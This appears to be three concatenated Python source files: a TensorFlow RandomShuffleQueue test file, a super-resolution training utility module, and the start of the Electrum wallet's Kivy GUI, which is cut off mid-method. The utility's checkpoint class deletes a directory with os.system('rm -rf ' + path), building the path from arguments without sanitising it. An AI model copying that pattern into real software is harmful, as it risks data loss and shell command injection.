seed = 887634792
q2 = data_flow_ops.RandomShuffleQueue(
1,
0,
dtypes_lib.float32, ((),),
shared_name="shared_queue",
seed=seed)
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
self.assertEqual(q2.dequeue().eval(), 10.0)
self.assertEqual(q1_size_t.eval(), 0)
self.assertEqual(q2_size_t.eval(), 0)
q2.enqueue((20.0,)).run()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
self.assertEqual(q1.dequeue().eval(), 20.0)
self.assertEqual(q1_size_t.eval(), 0)
self.assertEqual(q2_size_t.eval(), 0)
def testSharedQueueSameSessionGraphSeedNone(self):
with self.cached_session():
q1 = data_flow_ops.RandomShuffleQueue(
1,
0,
dtypes_lib.float32, ((),),
shared_name="shared_queue",
seed=98765432)
q1.enqueue((10.0,)).run()
# If both graph and op seeds are not provided, the default value must be
# used, and in case a shared queue is already created, the second queue op
# must accept any previous seed value.
random_seed.set_random_seed(None)
q2 = data_flow_ops.RandomShuffleQueue(
1, 0, dtypes_lib.float32, ((),), shared_name="shared_queue")
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
def testIncompatibleSharedQueueErrors(self):
with self.cached_session():
q_a_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_a")
q_a_2 = data_flow_ops.RandomShuffleQueue(
15, 5, dtypes_lib.float32, shared_name="q_a")
q_a_1.queue_ref.op.run()
with self.assertRaisesOpError("capacity"):
q_a_2.queue_ref.op.run()
q_b_1 = data_flow_ops.RandomShuffleQueue(
10, 0, dtypes_lib.float32, shared_name="q_b")
q_b_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_b")
q_b_1.queue_ref.op.run()
with self.assertRaisesOpError("min_after_dequeue"):
q_b_2.queue_ref.op.run()
q_c_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_c")
q_c_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, shared_name="q_c")
q_c_1.queue_ref.op.run()
with self.assertRaisesOpError("component types"):
q_c_2.queue_ref.op.run()
q_d_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_d")
q_d_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_d")
q_d_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_d_2.queue_ref.op.run()
q_e_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_e")
q_e_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_e")
q_e_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_e_2.queue_ref.op.run()
q_f_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_f")
q_f_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 4)], shared_name="q_f")
q_f_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_f_2.queue_ref.op.run()
q_g_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_g")
q_g_2 = data_flow_ops.RandomShuffleQueue(
10, 5, (dtypes_lib.float32, dtypes_lib.int32), shared_name="q_g")
q_g_1.queue_ref.op.run()
with self.assertRaisesOpError("component types"):
q_g_2.queue_ref.op.run()
q_h_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, seed=12, shared_name="q_h")
q_h_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, seed=21, shared_name="q_h")
q_h_1.queue_ref.op.run()
with self.assertRaisesOpError("random seeds"):
q_h_2.queue_ref.op.run()
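  # The checks in testIncompatibleSharedQueueErrors above show that two queue ops
  # may only share state (via shared_name) when their capacity, min_after_dequeue,
  # component types, component shapes and random seeds all match; any mismatch is
  # reported when the second queue op runs.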
def testSelectQueue(self):
with self.cached_session():
num_queues = 10
qlist = list()
for _ in xrange(num_queues):
qlist.append(
data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32))
# Enqueue/Dequeue into a dynamically selected queue
for _ in xrange(20):
index = np.random.randint(num_queues)
q = data_flow_ops.RandomShuffleQueue.from_list(index, qlist)
q.enqueue((10.,)).run()
self.assertEqual(q.dequeue().eval(), 10.0)
def testSelectQueueOutOfRange(self):
with self.cached_session():
q1 = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
q2 = data_flow_ops.RandomShuffleQueue(15, 0, dtypes_lib.float32)
enq_q = data_flow_ops.RandomShuffleQueue.from_list(3, [q1, q2])
with self.assertRaisesOpError("is not in"):
enq_q.dequeue().eval()
def _blockingDequeue(self, sess, dequeue_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(dequeue_op)
def _blockingDequeueMany(self, sess, dequeue_many_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(dequeue_many_op)
def _blockingDequeueUpTo(self, sess, dequeue_up_to_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(dequeue_up_to_op)
def _blockingEnqueue(self, sess, enqueue_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(enqueue_op)
def _blockingEnqueueMany(self, sess, enqueue_many_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(enqueue_many_op)
def testResetOfBlockingOperation(self):
with self.cached_session() as sess:
q_empty = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.float32, (
(),))
dequeue_op = q_empty.dequeue()
dequeue_many_op = q_empty.dequeue_many(1)
dequeue_up_to_op = q_empty.dequeue_up_to(1)
q_full = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.float32, ((),))
sess.run(q_full.enqueue_many(([1.0, 2.0, 3.0, 4.0, 5.0],)))
enqueue_op = q_full.enqueue((6.0,))
enqueue_many_op = q_full.enqueue_many(([6.0],))
threads = [
self.checkedThread(
self._blockingDequeue, args=(sess, dequeue_op)),
self.checkedThread(
self._blockingDequeueMany, args=(sess, dequeue_many_op)),
self.checkedThread(
self._blockingDequeueUpTo, args=(sess, dequeue_up_to_op)),
self.checkedThread(
self._blockingEnqueue, args=(sess, enqueue_op)),
self.checkedThread(
self._blockingEnqueueMany, args=(sess, enqueue_many_op))
]
for t in threads:
t.start()
time.sleep(0.1)
sess.close() # Will cancel the blocked operations.
for t in threads:
t.join()
def testDequeueManyInDifferentOrders(self):
with self.cached_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue_many(5)
deq2 = q2.dequeue_many(5)
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
results[0].extend(deq1.eval())
results[1].extend(deq2.eval())
q1.close().run()
q2.close().run()
results[2].extend(deq1.eval())
results[3].extend(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testDequeueUpToInDifferentOrders(self):
with self.cached_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue_up_to(5)
deq2 = q2.dequeue_up_to(5)
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
results[0].extend(deq1.eval())
results[1].extend(deq2.eval())
q1.close().run()
q2.close().run()
results[2].extend(deq1.eval())
results[3].extend(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testDequeueInDifferentOrders(self):
with self.cached_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue()
deq2 = q2.dequeue()
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
for _ in range(5):
results[0].append(deq1.eval())
results[1].append(deq2.eval())
q1.close().run()
q2.close().run()
for _ in range(5):
results[2].append(deq1.eval())
results[3].append(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testBigEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.int32, ((),))
elem = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
enq = q.enqueue_many((elem,))
deq = q.dequeue()
size_op = q.size()
enq_done = []
def blocking_enqueue():
enq_done.append(False)
# This will fill the queue and then block until enough dequeues happen.
self.evaluate(enq)
enq_done.append(True)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The enqueue should start and then block.
results = []
results.append(deq.eval()) # Will only complete after the enqueue starts.
self.assertEqual(len(enq_done), 1)
self.assertEqual(self.evaluate(size_op), 5)
for _ in range(3):
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 1)
self.assertEqual(self.evaluate(size_op), 5)
# This dequeue will unblock the thread.
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 2)
thread.join()
for i in range(5):
self.assertEqual(size_op.eval(), 5 - i)
results.append(deq.eval())
self.assertEqual(size_op.eval(), 5 - i - 1)
self.assertItemsEqual(elem, results)
def testBigDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(2, 0, dtypes_lib.int32, ((),))
elem = np.arange(4, dtype=np.int32)
enq_list = [q.enqueue((e,)) for e in elem]
deq = q.dequeue_many(4)
results = []
def blocking_dequeue():
# Will only complete after 4 enqueues complete.
results.extend(self.evaluate(deq))
thread = self.checkedThread(target=blocking_dequeue)
thread.start()
# The dequeue should start and then block.
for enq in enq_list:
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(results), 0)
self.evaluate(enq)
# Enough enqueued to unblock the dequeue
thread.join()
self.assertItemsEqual(elem, results)
if __name__ == "__main__":
test.main()
|
utility.py
|
import os
import math
import time
import datetime
from multiprocessing import Process
from multiprocessing import Queue
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import imageio
import torch
import torch.optim as optim
import torch.optim.lr_scheduler as lrs
class timer():
def __init__(self):
self.acc = 0
self.tic()
def tic(self):
self.t0 = time.time()
def toc(self, restart=False):
diff = time.time() - self.t0
if restart: self.t0 = time.time()
return diff
def hold(self):
self.acc += self.toc()
def release(self):
ret = self.acc
self.acc = 0
return ret
def reset(self):
self.acc = 0
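# Minimal usage sketch for the timer above (illustration only, not part of the
# original module):
#
#   t = timer()                      # starts timing on construction
#   run_training_step()              # hypothetical workload
#   elapsed = t.toc(restart=True)    # seconds since the last tic()/restart
#   t.hold(); total = t.release()    # accumulate, then read back and reset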
class checkpoint():
def __init__(self, args):
self.args = args
self.ok = True
self.log = torch.Tensor()
now = datetime.datetime.now().strftime('%Y-%m-%d-%H:%M:%S')
if not args.load:
if not args.save:
args.save = now
self.dir = os.path.join('..', 'experiment', args.save)
else:
self.dir = os.path.join('..', 'experiment', args.load)
if os.path.exists(self.dir):
self.log = torch.load(self.get_path('psnr_log.pt'))
print('Continue from epoch {}...'.format(len(self.log)))
else:
args.load = ''
if args.reset:
os.system('rm -rf ' + self.dir)
args.load = ''
os.makedirs(self.dir, exist_ok=True)
os.makedirs(self.get_path('model'), exist_ok=True)
for d in args.data_test:
os.makedirs(self.get_path('results-{}'.format(d)), exist_ok=True)
open_type = 'a' if os.path.exists(self.get_path('log.txt')) else 'w'
self.log_file = open(self.get_path('log.txt'), open_type)
with open(self.get_path('config.txt'), open_type) as f:
f.write(now + '\n\n')
for arg in vars(args):
f.write('{}: {}\n'.format(arg, getattr(args, arg)))
f.write('\n')
self.n_processes = 8
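        # Directory layout produced by this constructor:
        #   ../experiment/<args.save or args.load>/
        #       model/                checkpoints saved by trainer.model.save()
        #       results-<dataset>/    one folder per entry in args.data_test
        #       log.txt, config.txt   training log and a dump of all arguments
        #       psnr_log.pt           PSNR history, reloaded when resuming from args.load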
def get_path(self, *subdir):
return os.path.join(self.dir, *subdir)
def save(self, trainer, epoch, is_best=False):
trainer.model.save(self.get_path('model'), epoch, is_best=is_best)
trainer.loss.save(self.dir)
trainer.loss.plot_loss(self.dir, epoch)
self.plot_psnr(epoch)
trainer.optimizer.save(self.dir)
torch.save(self.log, self.get_path('psnr_log.pt'))
def add_log(self, log):
self.log = torch.cat([self.log, log])
def write_log(self, log, refresh=False):
print(log)
self.log_file.write(log + '\n')
if refresh:
self.log_file.close()
self.log_file = open(self.get_path('log.txt'), 'a')
def done(self):
self.log_file.close()
def plot_psnr(self, epoch):
axis = np.linspace(1, epoch, epoch)
for idx_data, d in enumerate(self.args.data_test):
label = 'SR on {}'.format(d)
fig = plt.figure()
plt.title(label)
for idx_scale, scale in enumerate(self.args.scale):
plt.plot(
axis,
self.log[:, idx_data, idx_scale].numpy(),
label='Scale {}'.format(scale)
)
plt.legend()
plt.xlabel('Epochs')
plt.ylabel('PSNR')
plt.grid(True)
plt.savefig(self.get_path('test_{}.pdf'.format(d)))
plt.close(fig)
def begin_background(self):
self.queue = Queue()
def bg_target(queue):
while True:
if not queue.empty():
filename, tensor = queue.get()
if filename is None: break
imageio.imwrite(filename, tensor.numpy())
self.process = [
Process(target=bg_target, args=(self.queue,)) \
for _ in range(self.n_processes)
]
for p in self.process: p.start()
def end_background(self):
for _ in range(self.n_processes): self.queue.put((None, None))
while not self.queue.empty(): time.sleep(1)
for p in self.process: p.join()
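    # The background writer processes consume (filename, tensor) pairs from the
    # queue and exit when they receive the (None, None) sentinel queued by
    # end_background(); save_results() below only enqueues work, the actual
    # imageio.imwrite happens in the worker processes.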
def save_results(self, dataset, filename, save_list):
if self.args.save_results:
filename = self.get_path(
'results-{}'.format(dataset.dataset.name),
'{}'.format(filename)
)
postfix = ('SR', 'LR', 'HR')
for v, p in zip(save_list, postfix):
normalized = v[0].mul(255 / self.args.rgb_range)
tensor_cpu = normalized.byte().permute(1, 2, 0).cpu()
                # include the postfix so the SR/LR/HR outputs do not overwrite each other
                self.queue.put(('{}_{}.png'.format(filename, p), tensor_cpu))
def quantize(img, rgb_range):
pixel_range = 255 / rgb_range
return img.mul(pixel_range).clamp(0, 255).round().div(pixel_range)
def calc_psnr(sr, hr, scale, rgb_range, dataset=None):
if hr.nelement() == 1: return 0
diff = (sr - hr) / rgb_range
gray_coeffs = [65.738, 129.057, 25.064]
convert = diff.new_tensor(gray_coeffs).view(1, 3, 1, 1) / 256
diff = diff.mul(convert).sum(dim=1)
mse = diff.pow(2).mean()
return -10 * math.log10(mse)
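# calc_psnr above collapses the SR/HR difference to a single luma channel using
# BT.601-style RGB weights (stored scaled by 256, hence the division by 256) and
# returns -10 * log10(MSE), i.e. PSNR in dB for signals normalised by rgb_range.
# Note that the `scale` and `dataset` arguments are accepted but unused in this
# variant.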
def make_optimizer(args, target):
    '''Build the optimizer and its learning-rate scheduler together.'''
# optimizer
trainable = filter(lambda x: x.requires_grad, target.parameters())
kwargs_optimizer = {'lr': args.lr, 'weight_decay': args.weight_decay}
if args.optimizer == 'SGD':
optimizer_class = optim.SGD
kwargs_optimizer['momentum'] = args.momentum
elif args.optimizer == 'ADAM':
optimizer_class = optim.Adam
kwargs_optimizer['betas'] = args.betas
kwargs_optimizer['eps'] = args.epsilon
elif args.optimizer == 'RMSprop':
optimizer_class = optim.RMSprop
kwargs_optimizer['eps'] = args.epsilon
# scheduler
milestones = list(map(lambda x: int(x), args.decay.split('-')))
kwargs_scheduler = {'milestones': milestones, 'gamma': args.gamma}
scheduler_class = lrs.MultiStepLR
class CustomOptimizer(optimizer_class):
def __init__(self, *args, **kwargs):
super(CustomOptimizer, self).__init__(*args, **kwargs)
def _register_scheduler(self, scheduler_class, **kwargs):
self.scheduler = scheduler_class(self, **kwargs)
def save(self, save_dir):
torch.save(self.state_dict(), self.get_dir(save_dir))
def load(self, load_dir, epoch=1):
self.load_state_dict(torch.load(self.get_dir(load_dir)))
if epoch > 1:
for _ in range(epoch): self.scheduler.step()
def get_dir(self, dir_path):
return os.path.join(dir_path, 'optimizer.pt')
def schedule(self):
self.scheduler.step()
def get_lr(self):
return self.scheduler.get_lr()[0]
def get_last_epoch(self):
return self.scheduler.last_epoch
optimizer = CustomOptimizer(trainable, **kwargs_optimizer)
optimizer._register_scheduler(scheduler_class, **kwargs_scheduler)
return optimizer
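# A minimal usage sketch for make_optimizer (illustrative only; `model`, `loader`,
# `criterion` and the `args` fields are hypothetical and must match the surrounding
# project's option parser):
#
#   optimizer = make_optimizer(args, model)   # e.g. args.optimizer='ADAM', args.lr=1e-4,
#                                             #      args.decay='200-400', args.gamma=0.5
#   for epoch in range(args.epochs):
#       for lr_img, hr_img in loader:
#           optimizer.zero_grad()
#           loss = criterion(model(lr_img), hr_img)
#           loss.backward()
#           optimizer.step()
#       optimizer.schedule()                  # advance the attached MultiStepLR scheduler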
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import electrum
from electrum.bitcoin import TYPE_ADDRESS
from electrum import WalletStorage, Wallet
from electrum_gui.kivy.i18n import _
from electrum.paymentrequest import InvoiceStore
from electrum.util import profiler, InvalidPassword
from electrum.plugins import run_hook
from electrum.util import format_satoshis, format_satoshis_plain
from electrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble
from .uix.dialogs import OutputList, OutputItem
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# Register a widget cache to keep memory usage down; timeout=0 keeps entries cached forever.
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_gui.kivy.uix.screens')
# Register fonts; without this you won't be able to use bold/italic inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import base_units
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_checkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
host, port, protocol, proxy, auto_connect = self.network.get_parameters()
self.network.set_parameters(host, port, protocol, proxy, self.auto_connect)
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
for index, b in self.network.blockchains.items():
if name == self.network.get_blockchain_name(b):
self.network.follow_chain(index)
#self.block
names = [self.network.blockchains[b].get_name() for b in chains]
if len(names) >1:
ChoiceDialog(_('Choose your chain'), names, '', cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'bitcoin':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self._trigger_update_history()
def _get_bu(self):
return self.electrum_config.get('base_unit', 'mBTC')
def _set_bu(self, value):
assert value in base_units.keys()
self.electrum_config.set_key('base_unit', value, True)
self._trigger_update_status()
self._trigger_update_history()
base_unit = AliasProperty(_get_bu, _set_bu)
status = StringProperty('')
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
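# Worked example (assuming electrum's usual base_units mapping, where 'mBTC' has
# 5 decimal places): with base_unit == 'mBTC', get_amount('1.5 mBTC') returns
# int(10**5 * Decimal('1.5')) == 150000 satoshis, and format_satoshis_plain(150000, 5)
# renders that back as '1.5'.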
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Current orientation of the device the app is running on.
Can be one of `landscape` or `portrait`.
:data:`orientation` is a read-only `AliasProperty`. Defaults to 'landscape'.
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Tries to ascertain the kind of device the app is running on.
Can be one of `tablet` or `phone`.
:data:`ui_mode` is a read-only `AliasProperty`. Defaults to 'phone'.
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
self.pause_time = 0
App.__init__(self)#, **kwargs)
title = _('Electrum App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
host, port, protocol, proxy_config, auto_connect = self.network.get_parameters()
self.server_host = host
self.server_port = port
self.auto_connect = auto_connect
self.proxy_config = proxy_config if proxy_config else {}
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so that wallet/status/history updates happen at most twice per second
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
def wallet_name(self):
return os.path.basename(self.wallet.storage.path) if self.wallet else ' '
def on_pr(self, pr):
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitcoin:'):
self.set_URI(data)
return
# try to decode transaction
from electrum.transaction import Transaction
from electrum.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrum.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False):
from .uix.dialogs.qr_dialog import QRDialog
popup = QRDialog(title, data, show_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
